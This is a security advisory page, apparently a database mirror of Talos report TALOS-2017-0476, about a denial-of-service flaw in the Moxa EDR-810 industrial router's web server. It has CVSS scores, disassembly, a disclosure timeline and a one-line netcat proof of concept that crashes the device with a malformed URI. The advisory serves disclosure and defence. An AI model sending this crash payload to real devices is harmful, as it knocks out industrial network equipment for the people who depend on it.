Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
talosTalos IntelligenceTALOS-2017-0476
HistoryApr 13, 2018 - 12:00 a.m.

Moxa EDR-810 Web Server URI Denial of Service Vulnerability

2018-04-1300:00:00
Talos Intelligence
www.talosintelligence.com
19

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

EPSS

0.001

Percentile

49.4%

JSON

Summary

An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

<https://www.moxa.com/product/EDR-810.htm&gt;

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

Details

When the web server is processing HTTP requests it checks the first character of the URI for a / (0x2F). If the first character is not a 0x2F the service will crash.

.text:00061460                 LDR             R3, [R11,#s1]
.text:00061464                 LDRB            R3, [R3]
.text:00061468                 CMP             R3, #0x2F ; '/'
.text:0006146C                 BEQ             loc_61454

Exploit Proof-of-Concept

echo 'GET A HTTP/1.1' | nc -nv 192.168.127.254 80

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Related

cvelist 1
prion 1
nessus 1
nvd 1
cve 1
seebug 1
talosblog 1
cvelist
cvelist
CVE-2017-12124
2018-05-14 20:00:00
prion
prion
Null pointer dereference
2018-05-14 20:29:00
nessus
nessus
Moxa EDR-810 Web Server URI Denial of Service (CVE-2017-12124)
2023-08-02 00:00:00
nvd
nvd
CVE-2017-12124
2018-05-14 20:29:00
cve
cve
CVE-2017-12124
2018-05-14 20:29:00
seebug
seebug
Moxa EDR-810 Web Server URI Denial of Service Vulnerability(CVE-2017-12124)
2018-04-16 00:00:00
talosblog
talosblog
Vulnerability Spotlight: Multiple Vulnerabilities in Moxa EDR-810 Industrial Secure Router
2018-04-13 08:57:00

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

EPSS

0.001

Percentile

49.4%

JSON
Related for TALOS-2017-0476
cvelist1prion1nessus1nvd1cve1seebug1talosblog1